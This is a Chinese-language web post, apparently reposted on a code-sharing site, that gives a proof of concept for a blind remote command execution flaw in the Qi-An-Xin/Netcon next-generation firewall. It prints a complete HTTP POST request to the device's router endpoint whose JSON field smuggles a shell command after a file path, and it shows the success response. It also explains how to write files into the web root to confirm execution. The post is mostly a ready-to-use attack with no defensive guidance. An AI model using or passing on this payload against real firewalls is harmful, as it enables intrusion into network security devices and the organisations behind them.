2021年最新HW漏洞奇安信防火牆網康下一代RCE漏洞細節參考


漏洞信息:

漏洞名稱:奇安信 網康下一代防火牆 RCE漏洞。
漏洞性質:遠程命令執行
漏洞利用特點:命令執行之后沒有回顯
利用方式:防火牆使用linux進行開發的,可以使用echo xxx >123.txt這樣的方式寫入文件。 當文件生成目錄在網站根目錄下就可以直接訪問了。

POC

POST /directdata/direct/router HTTP/1.1
Host: x.x.x.x
Connection: close
Cache-Control: max-age=0
sec-ch-ua: "Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://x.x.x.x/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 178

{"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;whoami"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="}

注意POS路徑

POST /directdata/direct/router

 

和命令執行這段

{"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;whoami"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="}

命令結果不回顯,但可以看返回代碼確認執行成功與否

[{"type":"rpc","tid":17,"action":"SSLVPN_Resource","method":"deleteImage","result":{"success":true}}]

看到帶true字樣就是命令執行成功。

另外注意這個是命令執行漏洞,所以不懂liunx命令的不要輕易嘗試。

測試有四種payload

也就是增刪查改四種。

這里就不寫了。

再詳細的,行內人士表明身份可以咨詢。

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM